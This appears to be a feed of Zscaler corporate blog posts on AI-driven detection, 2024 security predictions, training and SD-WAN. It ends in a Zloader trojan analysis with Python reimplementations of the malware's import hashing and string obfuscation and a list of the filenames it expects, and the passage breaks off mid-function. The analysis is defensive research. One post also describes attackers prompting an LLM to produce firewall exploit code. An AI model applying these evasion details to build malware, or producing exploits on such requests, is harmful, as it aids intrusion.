2021-03-12 | | 4a6e7f055d5bf4fd6d2a401c1b3d18ab
2021-04-12 | | dc2acf1704456880208146c91692cfc8
2021-04-15 | | 3ca1f0e708283f21c9a10ef4acf40990
2021-04-15 | | 1e71ea79c5a70bb8c729037132855b5a
2021-04-22 | | 66a87dbc24af866849646911f4841a28
2021-04-29 | | 25984af48fa27ec36bd257f8478aa628
2021-04-29 | | c1849c1ee3b8146c6fb836dae0b64652
2021-05-06 | | d45e04df3c9270a01e9fb9e4e8006acc
2021-09-20 | | 9a1c1497428743b4e199f2583f3d8390
2021-09-27 | | 0865757dfe54c2d01c5cef5bfd3162c5
2021-09-27 | | c6dea1f4e6ee1ed4c0383cd1af456649
2021-11-03 | | 1d4952cbe998312fd2bf810535db8a20
2021-11-03 | | 6cce1ec83d1428de9fcb0c3791efabd1
2021-11-04 | | e111d982dc0c12f23fa3f446d674600b
2021-11-04 | | 751f7d8ad6b2308cd1750fc23f606b53
2021-12-09 | | 8bb4208a50c041f9cdfc26815905eab3
2022-02-10 | | bcb8e64c5a69c7a572ca34450712fb2f
2022-02-14 | | 54e3f20f74c1089e89841798ffaac084
2022-02-14 | | 95adeb6a1c1e0a9d9ee4ecafb6079b37
2022-02-15 | | da206d25fddf3286f42ec7626d8bb676
2022-02-18 | | 3ba490216d4cdf92661444d896fefac3
2022-02-24 | | 8fa26ff07c3b5e1653e55b8a567b7623
2022-02-24 | | 1253695c63136edb1f6b37bbfd83db55
2022-04-06 | | 2853985cab3c5b83eec38ae1f3a890be
2022-04-29 | | 5e7deb4acb4429498693bc45db68978a
2022-05-04 | | 2273dd59ca71c4f078cab09d93093294
2022-05-04 | | 40d5e775a52c94842c97d012eb94efdc
2022-05-04 | | f1d47a4dc1d11b17e51419299dc282e4
2022-05-12 | | 2f17bd9f4b9edd91a7fd80ef32981f70
2022-05-18 | | 7dcbd74778754eee85810a4393d8e3ef
2022-05-18 | | e9e9d194f3ee9822852309cc83455eea
2022-05-23 | | 019117f66e43de489b3ff56377f9907b
2022-05-24 | | 28f84ffa14c7ef3936a00d3bd751bdb3
2022-06-07 | | d88ee89344d04f83eacd3614785560ef
2022-08-31 | | 3ff9d9dbf8c7a6865faeb43188afa6b4
2022-09-06 | | 3e86ac10b4e7d818e0f410130bb7f237
2022-09-08 | | 377acb7149fdfa56c090d9a12619a53c
2022-09-15 | | e5ebdec7417ad847e4325c4114e41809
2022-09-20 | | c23d2cd7d10a5f88032ddfcab4cfe146
2022-09-28 | | 050ce5fb25ffd3e907a5c81a6711fcea
2022-10-04 | | b857efb30d9e35bc83a294580ad8cc3a
2022-10-10 | | 6dc027269262b93351633eb8af4623ef
2022-10-11 | | e5eb07b009ca666f91ef5fe48269ca52
2022-10-25 | | 0971b8e78fcc6f9158e279376116c8c4
2022-10-26 | | 4fbebc9879ec1f95e759cb8b5d9fb89d
2022-10-28 | | 66a0741f8f43b584e387459b367097c1
2022-10-31 | | 6d61a88890be4ab5116cb712ff7788f4
2022-11-08 | | da75924c717524a8d17de126f8368ec4
2022-11-08 | | 5971c4a485e881268ca28f24fdedc4e5
2022-11-16 | | 22e45a212998d2ee264b6756b2972901
2022-11-28 | | accc6d9ba88040c89df34ef1749944d1
2022-12-13 | | 22b3cb9b0bacd525a83aab5b1a853f63
2022-12-20 | | bebebd4e16a88f43f16e4c6c811c9894
2022-12-20 | | cafb7b2f8383cf9686f144dc2082f287
2022-12-22 | | 6e3b4252903c0f3a153e011445ad2179
2023-01-31 | | 3e3bc981a7fdbae10b40cd6683edacbb
2023-01-31 | | a12dd4324bbf1129d9fae1b3d1e6b9ca
2023-05-02 | | ebec03d53d716cd780c92c5c29a95e6b
2023-05-10 | | 5e4c95b2c1b14a8a0f425576189fae60
2023-12-11 | | 8aec3f3ef66e4ff118bfdab1d031eadb
2023-12-13 | | 46e169516479d0614b663f302b5d1ace
2023-12-19 | | 795319d48ce1f680699beb03317c6bff
2024-01-22 | | de1d9ed6da4f34b4444b13442aac5033
2024-01-22 | | f382d0f92221831eeb39c108f8ccfa26
Wed, 31 Jan 2024 08:31:01 -0800 Javier Vicente

AI Detections Across the Attack Chain
Organizations face a constant barrage of cyberthreats. To combat these sophisticated attacks, Zscaler delivers layered security protections for a more effective security posture across the four key stages of an attack: attack surface discovery, compromise, lateral movement, and data exfiltration. Heading into 2024, with all the buzz surrounding artificial intelligence (AI) over the past year, we are asked daily by prospects and customers, "Zscaler, how do you use AI to keep us safer?" For more on where we see AI and security headed in 2024, please see the blog from our founder, Jay Chaudhry. In this blog, we will explore a handful of examples of Zscaler AI use across key stages of an attack, demonstrating how it can detect and stop threats, protect data, and make teams more efficient. Truth be told, we began to add AI detections into our portfolio some years ago to further bolster other detection methods, and it has paid off.
Stage 1: Attack surface discovery
While we will spend the better part of this blog discussing AI in other areas, the first stage of an attack involves attackers probing attack surfaces to identify potential weaknesses to be exploited. These are often things like VPN/firewall misconfigurations or vulnerabilities, or unpatched servers. We wholeheartedly suggest considering ways to cloak your currently discoverable applications behind Zscaler to immediately reduce your attack surface and your risk of successful attacks.
Stage 2: Risk of compromise
During the compromise stage, attackers exploit vulnerabilities to gain unauthorized access to employee systems or applications. Zscaler's AI-powered products help reduce the risk of compromise while prioritizing productivity.
AI-powered phishing/C2 prevention: We better detect and stop credential theft and browser exploitation from phishing pages with real-time analytics on threat intelligence from 300 trillion daily signals, ThreatLabz research, and dynamic browser isolation. This means our AI makes us even more efficient in detecting new phishing or C2 domains.
File-based attacks: We use AI in our cloud sandbox to ensure there is no tradeoff between security and productivity. Historically, in the case of the sandbox, a new file arrives and users must wait as it is analyzed, interrupting productivity. Our AI Instant Verdict in the sandbox prevents patient-zero infections by instantly blocking high-confidence malicious files, eliminating the need to wait for analysis of files that are very likely malicious. Our model fidelity is the result of years of ongoing training, analysis, and tuning based on over 550 million file samples.
AI to block web threats: Additionally, Zscaler's AI-powered browser isolation blocks zero-day threats while ensuring employees can access the right sites to get their jobs done.
URL filtering is effective in keeping users safe, but because sites are either allowed or blocked, some blocked sites are safe and needed for work. This is a productivity drain, as users cannot access legitimate sites for work, resulting in unnecessary helpdesk tickets. AI Smart Isolation determines when a site might be risky and opens it in isolation. This means organizations do not have to overblock sites to support productivity and can also maintain a strong web security posture.
Stage 3: Lateral movement
Once inside an organization, attackers attempt to move laterally to gain access to sensitive data. Zscaler's AI innovation reduces the potential blast radius by employing automated app segmentation based on analysis of user access patterns to limit lateral movement risk. For instance, if we see only 250 of 4,500 employees accessing a finance application, we will use this data to automatically create an app segment that limits access to only those 250 employees, thus reducing the potential blast radius and lateral movement opportunity by ~94 percent.
Stage 4: Data exfiltration
The final stage of an attack involves the unauthorized exfiltration of sensitive data from a company. Zscaler uses AI to allow companies to deploy data protections faster to protect sensitive data. With AI-driven data discovery, organizations no longer struggle with the time-consuming task of data fingerprinting and classification that delays deployment. Innovative data discovery automatically finds and classifies all data out of the box. This means data is classified as sensitive information immediately, so it can be protected right away from potential exfiltration and data breaches.
Zscaler's AI-driven security products provide organizations with robust protection across the four key stages of an attack. We also rely on AI to deliver cybersecurity maturity assessments as part of our Risk360 cyber risk management product.
Rest assured, we are busy thinking, building, and adding new AI capabilities every day, so there is more to come, as AI-powered security is becoming indispensable in safeguarding organizations against cyberthreats.
Fri, 26 Jan 2024 08:00:01 -0800 Dan Gould

Cloud Workloads: Cybersecurity Predictions for 2024
The year 2023 witnessed explosive transitions in the cloud security market, with every aspect of the ecosystem (vendors, products, and infrastructure) undergoing significant change. Looking ahead to 2024, cybersecurity for workloads (VMs, containers, services) in the public cloud will continue to evolve as customers continue to strike a balance between aggressive cloud adoption and compliance with corporate security needs. Within this, CIOs and CISOs will challenge their teams to build a security platform that consolidates point products, supports multiple clouds (AWS, Azure, and GCP), and automates to scale security operations. As a result, we will see zero trust architecture leading the way in securing cloud workloads, real-time data protection, and centralized policy enforcement. Here are the top 5 trends we believe will unfold in 2024.
1. Lateral threat movement into clouds from on-premises environments will increase
The cloud is where organizations' most valuable assets, applications and data, are heading. Attackers are employing innovative techniques that involve compromising an organization's on-premises network and laterally moving to its cloud domain. These techniques are seeing increased popularity with threat actors as inconsistencies persist between on-premises and public cloud environments. An attack detailed by the Microsoft Security research team (source: MERCURY and DEV-1084: Destructive attack on hybrid environment) exemplifies this trend. The threat actors first compromised two privileged accounts, then leveraged them to manipulate the Azure Active Directory (Azure AD) Connect agent.
"Two weeks prior to deploying ransomware, the threat actors used a compromised, highly privileged account to gain access to the device where the Azure AD Connect agent was installed. We assess with high confidence that the threat actors then utilized the AADInternals tool to extract plaintext credentials of a privileged Azure AD account. These credentials were subsequently used to pivot from the targeted on-premises environment to the targeted Azure AD environment."

Fig. On-premises compromise pivots to the public cloud

2. Serverless services will significantly widen the attack surface

Serverless functions offer tremendous simplicity, allowing developers to focus solely on writing and deploying code without worrying about the underlying infrastructure. The adoption of microservices-based architectures will continue to drive the use of serverless functions due to their reusability as well as their ability to speed up application development. However, there is a significant security risk associated with serverless functions, as they interact with various input and event sources, often requiring HTTP or API calls to trigger actions. They also utilize cloud resources such as blob stores or block storage, employ queues to sequence interactions with other functions, and connect with devices. These touchpoints increase the attack surface, as many of them involve untrusted message formats and lack proper monitoring or auditing for standard application layer protection.

Fig. Serverless functions can access the full stack of additional services, creating a wide attack surface

3. Identity-based security policies will be redefined as they pertain to public cloud protection

As workloads start to mushroom in public clouds, each CSP will bring its own disparate identity capabilities. Unlike with users, there is no one ring (Active Directory) to rule them all.
IT shops will continue to deal with disconnected identity profiles across on-premises, private cloud, and public cloud for workloads. That said, in 2024, security teams will continue to deal with multiple workload attributes to write their security policies, and higher-level abstractions (like user-defined tags) will start to gain wider adoption. This will drive consistency between cybersecurity and other resource management functions (billing, access controls, authentication, reporting) for cloud workloads.

Fig. User-defined tags will be used to implement zero trust architecture to secure workloads in the cloud

4. Enterprises will evaluate and deploy cloud-delivered security platforms that support multiple public clouds

Staffing people and building architectures specialized to secure each public cloud will place the onus on security teams to seek out the solutions that work best for them. Enterprises will evaluate tools from CSPs such as cloud firewall point solutions, but will increasingly look for architectures that can centralize their cloud security policy definitions, enforcement, and remediation. Only when cyber prevention is delivered from one central platform can cyber defense be applied to all workloads—not just a few selective ones.

5. CIOs' willingness to hedge their bets across AWS, Azure, and GCP will dictate the implementation of security tools that can span multiclouds

When it comes to vendor best practices, CIOs are looking to diversify their cloud infrastructure portfolios. Doing so allows them to reduce reliance on a single vendor, integrate infrastructure inherited from mergers and acquisitions, and leverage best-of-breed services from different public clouds such as Google Cloud BigQuery for data analytics, AWS for mobile apps, and Oracle Cloud for ERP.

Fig. AWS shared responsibility framework for protecting cloud resources.
Every cloud vendor preaches the notion of “shared responsibility” when it comes to cybersecurity, placing the onus on the customer to implement a security infrastructure for their cloud resources. Savvy IT shops will ensure that they pick a cybersecurity platform that can support multiple public cloud environments. Customers can’t possibly entertain the idea of separate security tools for each public cloud—rather, they will standardize on one platform for all their needs.

Deploying workloads in the public cloud is not a new trend in the corporate world, but the topic of cloud workload security continues to get hotter and hotter. While there are no clear answers yet, there are a few indications of where customers will navigate in 2024. Namely, zero trust, as it provides immediate benefit in the near term and a solid framework for cloud workload security into the future.

Want to learn more about zero trust for cloud workloads? Click here for more Zscaler perspectives.

This blog is part of a series of blogs that provide forward-facing statements into access and security in 2024. The next blog in this series covers Zero Trust predictions.

Forward-Looking Statements

This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements.
These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024. Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at and on the SEC's website at. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.

Thu, 25 Jan 2024 08:00:02 -0800 Sakthi Chandra

Zscaler Academy: Reflecting on 2023 and Soaring into 2024

2023 was a year of transformation and innovation for Zscaler Academy. We reimagined cybersecurity education, tailoring it to the evolving landscape of zero trust security.
As we begin 2024, it's time to reflect on what we've achieved and show you what's on the horizon.

2023: Building the Pillars of Zero Trust Learning

New Training and Offerings: We revamped our curriculum, introducing the Zscaler for Users learning path and specializations in Data Protection, Cyberthreat Protection, and Workloads. Hands-on labs, live virtual training, and engaging workshops became the norm, bridging the gap between theory and practice.

New Approach: We embraced a learner-centric approach, catering to diverse learning styles and preferences. Self-paced e-learning, interactive webinars, and immersive workshops offered flexibility and depth, empowering individuals at all levels.

Certification: We evolved our certification program, aligning it with the latest zero trust advancements, and introduced an industry-standard third-party proctored certification exam. The Zscaler Digital Transformation Administrator (ZDTA) certification exam is the final step in the Zscaler for Users - Essentials learning path, and supports the journey of any security professional to validate their understanding of deploying and implementing the Zscaler Zero Trust Exchange platform.

Roadshows and Virtual Training: We took Zscaler Academy on the road, hosting virtual and in-person events like Zscaler Training Roadshows and Virtual Training workshops around the globe. These interactive sessions fostered connections, knowledge sharing, and a sense of community among Zscaler users and partners.

A Year of Bridging the Cybersecurity Skills Gap

Customers: We empowered customers to maximize the value of their Zscaler investments. Our training equipped administrators, security professionals, and end users with the skills to confidently navigate the Zero Trust Exchange.

Partners: We supported our partners in their growth journey. The Partner Academy provided the knowledge and expertise needed to build successful Zscaler practices and deliver exceptional customer service.
Workforce of the Future: We invested in the future by inspiring and equipping the next generation of cybersecurity professionals. Our initiatives are contributing to closing the cybersecurity skills gap, ensuring a talent pool prepared for the zero trust era through the Zscaler Academic Alliance Program.

The New Charter Era: What Awaits in 2024

Micro-Learning and Micro-Credentials: We're embracing bite-sized learning, offering micro-credentials for specific skills. This agile approach will allow you to stay ahead of the curve and acquire targeted knowledge on the go.

New Certifications: We'll be expanding our certification portfolio, introducing new paths that validate expertise in specific Zscaler solutions and emerging security domains.

More Training Courses and Events: We'll continue to diversify our offerings, adding new training courses (like Ransomware Protection, Deception, Troubleshooting, and more), live workshops, and virtual events. Expect deeper dives into specific technologies, industry trends, and best practices.

Personalized Learning: We're committed to personalization, utilizing data and insights to tailor learning recommendations and experiences to your individual needs and goals.

The Future Is Zero Trust, and Zscaler Academy Is Your Guide

As we step into 2024, Zscaler Academy remains your trusted partner on your zero trust journey. We'll continue to innovate, adapt, and empower you with the knowledge and skills to thrive in the dynamic security landscape. Stay tuned for exciting announcements and updates! We're dedicated to making Zscaler Academy the leading destination for zero trust education, ensuring you're always prepared to secure your future in the age of zero trust.

Join us in 2024! Let's keep learning, growing, and building a safer digital world together.

Wed, 24 Jan 2024 08:00:01 -0800 Prameet Chhabra

Navigating the Intersection of Cybersecurity and AI: Key Predictions for 2024

This article also appeared in VentureBeat.
Anticipating the future is a complex endeavor; however, I'm here to offer insights into potential trends that could shape the ever-evolving cybersecurity landscape in 2024. We engage with over 40% of Fortune 500 companies, and I personally have conversations with thousands of CXOs each year, which gives me a unique view into the possibilities that might impact the security landscape. Let's explore these potential trends and see what the future of cybersecurity might look like.

1. Generative AI will increase ransomware attacks

The utilization of GenAI technologies will expedite the identification of vulnerable targets, enabling cybercriminals to launch ransomware attacks with greater ease and sophistication. Before, when launching a cyberattack, hackers had to spend time identifying an organization's attack surface and the potential vulnerabilities that could be exploited in internet-facing applications and services. However, with the advent of LLMs, the landscape has dramatically shifted. Now, a hacker can simply ask a straightforward question like, "Show me vulnerabilities for all firewalls for [a given organization] in a table format.” And the next command could be, “Build me exploit code for this firewall," and the task at hand becomes significantly easier.

GenAI can also help identify vulnerabilities among your supply chain partners and optimal paths that are connected to your network. It's important to recognize that even if you strengthen your own estate, vulnerabilities may still exist through other entry points, potentially making them the easiest targets for attacks. The combination of social engineering exploits and GenAI technology will result in a surge of cyber breaches, characterized by enhanced quality, diversity, and quantity. This will create a feedback loop that facilitates iterative improvements, making these breaches even more sophisticated and challenging to mitigate.
Defense Strategy: Using the Zscaler Zero Trust Exchange, customers can make their applications invisible to potential attackers, reducing the attack surface. If you can’t be reached, you can’t be breached.

2. AI will be used to fight AI

We will be witnessing a promising development where AI is being harnessed by security providers to combat the ever-evolving nature of AI-driven attacks. Enterprises generate a vast amount of logs containing signals that could indicate potential attacks. However, isolating these signals in a timely manner has been challenging due to signal-to-noise issues. With the advent of GenAI technologies, we now have the capability to identify potential avenues of attack more effectively. By leveraging GenAI, we can enhance triage and protection measures by understanding which vulnerabilities hackers are likely to exploit. Additionally, this technology enables us to detect attackers and exploits in near real-time. As a result, cloud security providers will develop AI-powered tools to proactively prevent potential areas of exploitation. In addition, with the advent of AI and ML tools, we have the capability to predict and identify potential vulnerabilities in an organization that are likely to be exploited. This will help reduce cyber breaches.

Defense Strategy: Zscaler is building tools such as breach predictors that could predict and prevent breaches powered by communication logs. Before any breach happens there is always reconnaissance activity. Because Zscaler sits in the middle of all communications, we have visibility into potential threats. This allows us to understand if a hacker has infiltrated an enterprise, and if so, suggest steps to prevent a breach.

3. The rise of firewall-free enterprises

Organizations are coming to a realization that despite significant investments in firewalls and VPNs, their security posture remains vulnerable. They are understanding that a true Zero Trust architecture has to be implemented.
Realizing the inherent security risks and false sense of security provided by firewall-based approaches, customers will move away from firewalls and VPNs as their main security technology. Over the next few years, firewalls will become archaic like mainframes. Organizations are awakening to the need for a more comprehensive and effective cybersecurity strategy. The coming years will witness a significant acceleration in the adoption and implementation of Zero Trust architecture and the rise of "firewall-free enterprises.” This transformative shift represents a crucial inflection point in the cybersecurity landscape.

Defense Strategy: This shift reflects a changing approach to cybersecurity, driven by the understanding that a firewall-centric approach is ineffective in safeguarding against evolving threats, prompting customers to seek true Zscaler Zero Trust solutions.

4. Broader adoption of Zero Trust segmentation

The number one cause of ransomware attacks is a flat network. Once hackers are on the network, they can easily move laterally, find high-value assets, encrypt them, and ask for ransom. Organizations have been trying to implement network-based segmentation to eliminate lateral movement. I have talked to hundreds of CISOs but have yet to meet one who has successfully completed network-based segmentation or microsegmentation. It is too cumbersome to implement and operationalize. In 2023, hundreds of enterprises successfully implemented the initial phase of Zero Trust architecture. Moving into 2024, we anticipate a broader adoption of Zero Trust-based segmentation. This approach simplifies implementation: you don’t need to create network segments, and you use Zero Trust technology to connect a certain group of applications to a certain group of applications.

Defense Strategy: Zscaler offers Zero Trust segmentation in two areas:
- User-to-application segmentation
- Application-to-application segmentation

5. Zero Trust SD-WAN will start to replace traditional SD-WAN

SD-WAN has helped enterprises save money by using the internet—a cheaper transport. But SD-WANs have not improved security, as they allow lateral threat movement. Zero Trust SD-WAN doesn’t put users on the network; it simply makes a point-to-point connection between users and applications, hence eliminating lateral threat movement. This protects enterprises from ransomware attacks. Zero Trust SD-WAN will emerge as an important technology to provide highly reliable, highly secure, and seamless connectivity. Zero Trust SD-WAN also reduces overhead, as enterprises no longer have to worry about managing route tables. Zero Trust SD-WAN makes every branch office like an internet cafe or a coffee shop: your employees can access any application without you having to extend your network to every branch office.

Defense Strategy: Zscaler offers a Zero Trust SD-WAN solution that is easy to implement with a Plug-n-Play appliance.

6. SEC regulations will drive far more active participation of Board members and CFOs in cyber risk reduction

Recognizing the damage that cyber breaches could cause to businesses, these key stakeholders will more actively engage in cybersecurity initiatives and decision-making processes. The increased involvement of CFOs and Boards of Directors in cybersecurity underscores the recognition that it is not solely a CIO or CISO’s responsibility, but a vital element of overall organizational resilience and risk management. Newly introduced SEC disclosure requirements will serve as a catalyst for boards to become more engaged in driving cybersecurity initiatives in their companies. More companies will require at least one board member with a strong background in cybersecurity.

Defense Strategy: Through Zscaler Risk360, we provide a holistic risk score for an organization which highlights the contributing factors to your cyber risk and compares your risk score with your peers, with trends over time.
In addition, Zscaler has added SEC disclosure reports generated by GenAI, leveraging the contributing factors that have been used to compute your company's risk score.

Mon, 22 Jan 2024 15:31:59 -0800 Jay Chaudhry

Bringing Zero Trust to Branches

Over the past five years, the tech industry has undergone significant transformation. Among the myriad changes in how organizations approach technology to gain a competitive edge, three primary shifts have had profound impacts:
- Migration of apps from traditional data centers to the cloud (the rise of SaaS)
- Hybrid workforce models, where employees operate from both regional offices and remote locations
- Proliferation of IoT/OT devices in factories and branch offices

Many enterprises are finding that limitations in their WAN infrastructure and gaps in network security impede their ability to deal with these three shifts. Traditional SD-WANs expand the attack surface and allow lateral threat movement. They connect various sites through site-to-site VPNs or routed overlays, establishing implicit trust that grants unrestricted access to critical business resources, even for compromised entities. Moreover, coarse-grained segmentation policies allow threats to move easily within the network.

With the rising number of threats and the adoption of IoT/OT devices, which are often invisible to the network, organizations need to ensure their WAN infrastructure adheres to zero trust principles. Traditional WAN infrastructure consists of multiple point products such as routers, firewalls, and VPNs, which can add up to substantial management challenges. Hence, organizations undertaking branch transformation need a solution that follows a “thin branch, thick cloud” model to reduce management complexities.

Zscaler Zero Trust SD-WAN securely connects branches, factories, and data centers without the complexity of VPNs, ensuring zero trust access for users, IoT/OT devices, and servers.
Using Zero Trust SD-WAN, enterprises can build a thin branch that eliminates unnecessary devices with a simple plug-and-play appliance that can be deployed using only an internet connection.

Figure 1: Traditional SD-WAN vs. Zero Trust SD-WAN

Zero Trust SD-WAN eliminates business risk

Unlike traditional SD-WANs that extend the network to remote sites, clouds, and third parties, Zero Trust SD-WAN connects users, IoT/OT devices, and applications to the resources they are entitled to access, without using routed overlays. This creates a zero trust network that eliminates the attack surface and prevents lateral threat movement. Since all traffic is proxied through the Zscaler Zero Trust Exchange, there are no publicly exposed IP addresses or VPN ports for hackers to compromise.

A recent Zscaler ThreatLabz report revealed a 400% increase in IoT and OT-based malware attacks since 2022, underscoring the need for organizations to have greater visibility and security around IoT/OT devices deployed in their networks. Often overlooked and invisible, IoT/OT is not adequately addressed when administrators design security policies for branch users, but as the ThreatLabz report shows, these devices represent a significant threat vector. Zero Trust SD-WAN provides complete device visibility, giving organizations a detailed view of all their IoT/OT devices as well as insights into the applications with which they communicate. Moreover, administrators no longer need separate policies for users and devices, since the same policies can be applied consistently to both.

Figure 2: IoT device discovery and classification

Many organizations have server-to-client communication use cases. For instance, a print server in a data center may need to issue a print command to a remote printer in a branch location. With Zero Trust SD-WAN, organizations don’t have to worry about exposed service ports that a hacker could exploit to breach the network.
All branch communication is proxied through the Zero Trust Exchange, which stitches the connection between the print server and the remote printer. Extending zero trust security to all entities, such as users, IoT/OT devices, and servers, enhances overall security.

Zero Trust SD-WAN replaces site-to-site VPNs

Traditional SD-WANs connect sites (e.g., branches, factories, data centers) using IPsec VPN tunnels. Routed overlays allow any device to communicate with any other device, server, or app, ensuring reachability between users, devices, and apps—reachability that hackers can exploit to easily access other resources in the network. With Zero Trust SD-WAN, branch traffic is forwarded directly to the Zero Trust Exchange, where Zscaler Internet Access (ZIA) or Zscaler Private Access (ZPA) policies can be applied for full security inspection and identity-based access control. Zero Trust SD-WAN dramatically simplifies branch communication with a zero trust network overlay that allows for flexible forwarding and simple policy management.

Figure 3: Site-to-site VPN replacement

Zero Trust SD-WAN simplifies mergers and acquisitions

Combining two separate businesses into one entity can provide enhanced efficiency, increased market presence, and other advantages. However, integrating new systems and routing domains into the existing environment can be a slow, painful process that takes many months to complete. With Zscaler, the entire M&A integration process can be far simpler and faster. Zero Trust SD-WAN communicates only with the Zero Trust Exchange, eliminating the need to merge routing domains between existing and acquired sites. By deploying Zero Trust SD-WAN at an acquired site, enterprises can steer traffic to the Zero Trust Exchange, which brokers the connection from the other end for secure communication. This results in successful day-one operation and onboarding of new sites in a matter of just weeks, or even days.

Figure 4: M&A integration

How does this all work?
Apps defined in the ZPA portal are assigned a synthetic IP address. Once a user initiates a connection to the new app using the synthetic IP, Zero Trust SD-WAN at that branch site sends traffic to the Zero Trust Exchange. In the acquired site, where the app is hosted, the App Connector (built into Zero Trust SD-WAN) initiates an inside-out connection to the Zero Trust Exchange. The Zero Trust Exchange brokers the connection from the user to the app.

Conclusion

Organizations need a networking solution that protects them from today’s growing cyberthreats, but traditional SD-WANs increase security risk and networking complexity. In contrast, Zero Trust SD-WAN brings zero trust principles to WANs by securely connecting users, IoT/OT devices, and servers. To enhance the security of branches, factories, and data centers, organizations must transition from traditional flat networks with implicit trust to zero trust networks. Adopting Zero Trust SD-WAN offers numerous benefits, such as mitigating cyber risk, lowering cost and complexity, enhancing business agility, and implementing a single-vendor SASE solution.

For more information, please visit the Zscaler Zero Trust SD-WAN webpage.

Mon, 22 Jan 2024 17:50:01 -0800 Karan Dagar

Zloader: No Longer Silent in the Night

Introduction

Zloader (aka Terdot, DELoader, or Silent Night) is a modular trojan born from the leaked Zeus source code. It surfaced publicly in 2016 during a targeted campaign against German banks [1], but its malicious activity traces back to at least August 2015. Zloader’s first run persisted until the beginning of 2018, when its activities abruptly ceased. Its resurgence at the end of 2019, marketed in underground forums as “Silent Night”, came with substantial alterations. The evolution of Zloader progressed steadily, leading to the development of version around September 2021. Similar to Qakbot, the threat actors using Zloader also pivoted from conducting banking fraud to ransomware.
In April 2022, security researchers executed a takedown operation [2] to dismantle the botnet, leading to an extended period of inactivity. After an almost two-year hiatus, Zloader reemerged with a new iteration that appears to have started development in September 2023. These new changes include new obfuscation techniques, an updated domain generation algorithm (DGA), RSA encryption for network communications, and native support in the loader for 64-bit versions of Windows. Initially, this new version was labeled with the old version number. However, over the past several months, they released version and . In this blog, we will explore these new updates to Zloader.

Key Takeaways

- Zloader dates back to 2015 and has been advertised in underground cybercriminal forums under the name “Silent Night” since the end of 2019.
- Zloader has returned after an almost two-year hiatus after being taken down in April 2022 by security researchers.
- The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time.
- Zloader continues to use junk code for obfuscation, as well as API import hashing and string encryption in an attempt to hinder malware analysis.

Technical Analysis

In the following sections, we dive into the technical details surrounding Zloader’s new updates to their anti-analysis techniques, embedded configuration, DGA, and network encryption.

Anti-analysis techniques

Zloader uses a combination of API import hashing, junk code, a filename check, and string obfuscation. The following sections analyze each technique.

Imports and API resolution

The newest Zloader samples only import a few functions from the kernel32 library. The remaining imports are resolved at runtime using checksums to obfuscate the functions that are used.
This technique, already present in older versions, changes its implementation, adding an XOR constant which changes between samples. Python code that replicates the API hashing algorithm is shown below.

```python
def calculate_checksum(func_name, xor_constant):
    # Case-insensitive rolling checksum over the API name
    checksum = 0
    for element in func_name.upper():
        checksum = 16 * checksum - (0 - (ord(element) + 1))
        # Fold the top nibble back into the low 28 bits when it overflows
        if checksum & 0xf0000000 != 0:
            checksum = ((((checksum & 0xf0000000) >> 24) ^ checksum) & 0xfffffff)
    # The final value is XORed with a constant that differs per sample
    return checksum ^ xor_constant
```

Code sample available on GitHub.

Junk code

Similar to previous versions, Zloader uses custom obfuscation. The new version of Zloader adds junk code that consists of various arithmetic operations, as shown in Figure 1 below.

Figure 1. Example Zloader 2.1 junk code

In Figure 1, the instructions inside the red box are the junk code.

Anti-sandbox

Each Zloader sample expects to be executed with a specific filename. If the filename does not match what the sample expects, it will not execute further. This could evade malware sandboxes that rename sample files. Figure 2 shows an example of a Zloader sample that expects its filename to be CodeForge.exe.

Figure 2. Example of Zloader’s anti-analysis filename check

ThreatLabz has observed Zloader use the following filenames:
- CodeForge.exe
- CyberMesh.exe
- EpsilonApp.exe
- FusionBeacon.exe
- FusionEcho.exe
- IonBeacon.dll
- IonPulse.exe
- KineticaSurge.dll
- QuantumDraw.exe
- SpectraKinetic.exe
- UltraApp.exe

String obfuscation

Similar to prior versions, Zloader implements a string obfuscation algorithm for some of the malware’s important strings, such as registry paths, DLL names, and the DGA’s top-level domain (TLD), using XOR with a hardcoded key. Python code that replicates the string obfuscation algorithm is shown below:

```python
def str_deobfuscate(enc_bin, enc_key):
    # enc_bin and enc_key are byte strings; the key repeats over the input
    res = ''
    for i, element in enumerate(enc_bin):
        k = enc_key[i % len(enc_key)]
        # (~element & k) | (~k & element) is a bitwise XOR of element and k
        res += chr(((element ^ 0xff) & k) | (~k & element))
    return res
```

Code sample available on GitHub.
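To put the import-hashing routine above to use during analysis, the following is an added example (not Zloader's code and not part of the original post): it precomputes the checksum of every export name an analyst has dumped from the DLLs a sample loads, resolves the checksums found in the sample back to API names, reports hash collisions, and recovers the per-sample XOR constant from a single known API call. The export-name list and the XOR constant are constructed sample values; the hashing routine mirrors the algorithm shown above.

```python
# Added example (not Zloader's code and not part of the original analysis): resolve
# Zloader-style import checksums back to API names. The hashing routine mirrors the
# algorithm shown above; the export-name list and the XOR constant are constructed
# sample values, not taken from a real sample.

# Constructed stand-in for the export table an analyst would dump from kernel32.dll
# and ntdll.dll with a PE parser; any list of export names works here.
SAMPLE_EXPORTS = [
    "CreateFileW", "ReadFile", "WriteFile", "VirtualAlloc", "VirtualProtect",
    "LoadLibraryA", "GetProcAddress", "CreateProcessW", "ExitProcess",
    "RegOpenKeyExW", "InternetOpenA", "HttpSendRequestA",
]
SAMPLE_XOR_CONSTANT = 0x5A3C9E1F  # constructed; the real value differs per sample


def calculate_checksum(func_name, xor_constant):
    """Zloader import hash: case-insensitive PJW-style checksum XORed with a per-sample constant."""
    checksum = 0
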